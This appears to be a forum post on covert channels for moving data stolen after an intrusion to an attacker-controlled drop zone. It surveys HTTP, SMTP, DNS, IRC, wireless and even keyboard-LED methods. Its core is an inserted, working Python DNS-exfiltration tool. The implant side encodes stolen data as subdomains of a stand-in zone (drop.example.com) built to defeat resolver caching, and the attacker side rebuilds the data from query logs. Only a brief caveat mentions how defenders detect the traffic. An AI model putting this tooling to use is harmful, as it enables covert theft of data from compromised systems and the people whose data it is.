This post is about ways, after a successful intrusion, to drop the data collected from a target system at a specific place and make it accessible "asynchronously" so you can harvest it later. Asynchronously here means you don't have to sit in front of your computer and wait for the infected systems to send data; you only connect to the drop zone from time to time and check it for new data. It's only a detail really, but it makes a difference =)
The usual ways to transmit such data are HTTP, SMTP or, if you prefer something more covert, DNS tunneling. I don't want to go too deep into the details here; they will follow in the documents section eventually.
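Of the three usual channels, DNS is the one that most naturally gives you an asynchronous drop zone: the implant resolves names under a zone whose authoritative server you run, the victim's own resolver forwards the queries for you, and that server's query log is the drop zone you read whenever you like. The following is an added example, not code from this post, assuming a hypothetical zone drop.example.com, a hypothetical session label "s1" and constructed log lines. It shows the implant side (chunking into base32 labels within the 63-octet label and 253-character name limits, with sequence numbers so caching resolvers can never swallow a chunk) and the drop-zone side (pulling names out of the log, tolerating reordering and retry duplicates, and reporting gaps):

```python
import base64
import re

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets ...
MAX_NAME = 253   # ... and a whole name at most 253 characters in text form

# Constructed sample payload standing in for data collected on the victim.
SAMPLE_DATA = b"user=alice;host=ws-17;secret=hunter2\n" * 3


def _b32(data: bytes) -> str:
    """Base32 without padding, lowercased so resolver 0x20 case randomisation can't break it."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, session: str, zone: str, payload_labels: int = 2) -> list:
    """Implant side: split data into names c<seq>.<b32>.<b32>.<session>.<zone>,
    followed by a single end marker e<count>.<session>.<zone>.
    35 bytes encode to exactly 56 base32 chars, so every payload label stays under 63."""
    chunk_bytes = 35 * payload_labels
    chunks = [data[i:i + chunk_bytes] for i in range(0, len(data), chunk_bytes)]
    names = []
    for seq, chunk in enumerate(chunks):
        enc = _b32(chunk)
        labels = [enc[i:i + 56] for i in range(0, len(enc), 56)]
        # the sequence number makes every name unique, so a caching resolver
        # never answers from cache and every chunk reaches the authoritative server
        name = ".".join([f"c{seq}", *labels, session, zone])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError(f"name too long: {name}")
        names.append(name)
    names.append(f"e{len(chunks)}.{session}.{zone}")
    return names


def extract_names(log_lines, session: str, zone: str) -> list:
    """Drop-zone side: pull this session's names out of arbitrary query-log lines.
    The regex only needs the name to appear as a token, so the log format doesn't matter."""
    pat = re.compile(r"[a-z0-9.-]+\." + re.escape(f"{session}.{zone}"), re.IGNORECASE)
    return [m.group(0).lower().rstrip(".") for line in log_lines for m in pat.finditer(line)]


def decode_queries(names, session: str, zone: str) -> bytes:
    """Reassemble the data; order, duplicates and unrelated names are all tolerated."""
    suffix = f".{session}.{zone}".lower()
    chunks, total = {}, None
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                   # other sessions or noise
        labels = name[:-len(suffix)].split(".")
        header, payload = labels[0], labels[1:]
        if not header[1:].isdigit():
            continue                                   # malformed, ignore
        if header[:1] == "e" and not payload:
            total = int(header[1:])
        elif header[:1] == "c" and payload:
            chunks[int(header[1:])] = _unb32("".join(payload))   # retries overwrite harmlessly
    if total is None:
        raise ValueError("no end marker yet; the transfer may still be running")
    missing = sorted(set(range(total)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunks {missing}; wait for retries or re-task the implant")
    return b"".join(chunks[i] for i in range(total))


def demo() -> bytes:
    """Constructed (made-up) log excerpt: out of order, one retry duplicate, one unrelated query."""
    session, zone = "s1", "drop.example.com"
    names = encode_queries(SAMPLE_DATA, session, zone)
    log = [f"query: {n} IN A" for n in reversed(names)]
    log.append(f"query: {names[0]} IN A")            # client retry -> duplicate chunk
    log.insert(1, "query: www.example.com IN A")      # noise from other lookups
    return decode_queries(extract_names(log, session, zone), session, zone)


if __name__ == "__main__":
    print(demo().decode())
```

Each name carries only about 70 bytes, so this is slow and noisy, which is the standing caveat with DNS exfiltration: a defender counting unique subdomains per zone, or alerting on long high-entropy labels, will see it long before the transfer finishes.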
Other possible examples are:
- NNTP (but to be honest, NNTP will die soon; regular users don't use it anymore and therefore don't have a news server configured, so you can't determine one reliably the way you can look up a domain's mail server via its MX records for SMTP)
- sending the data through an HTTP proxy you control
- sending it over an IRC network
Or, if you want to try more experimental ways:
- sending the data over an unused WLAN adapter, if you know where the infected computer is located
- sending the data over an unused Bluetooth adapter, if you know where the infected computer is located. You have to be quite close though; Bluetooth is not designed for longer distances
- or even a freaky solution: let the keyboard LEDs blink and send the data in Morse code. But this is more of a philosophical approach and not really effective =)
If anyone knows other protocols or clever ways of transmitting such data, let me know.
http://soldierx.com/tutorials/Covert-Channels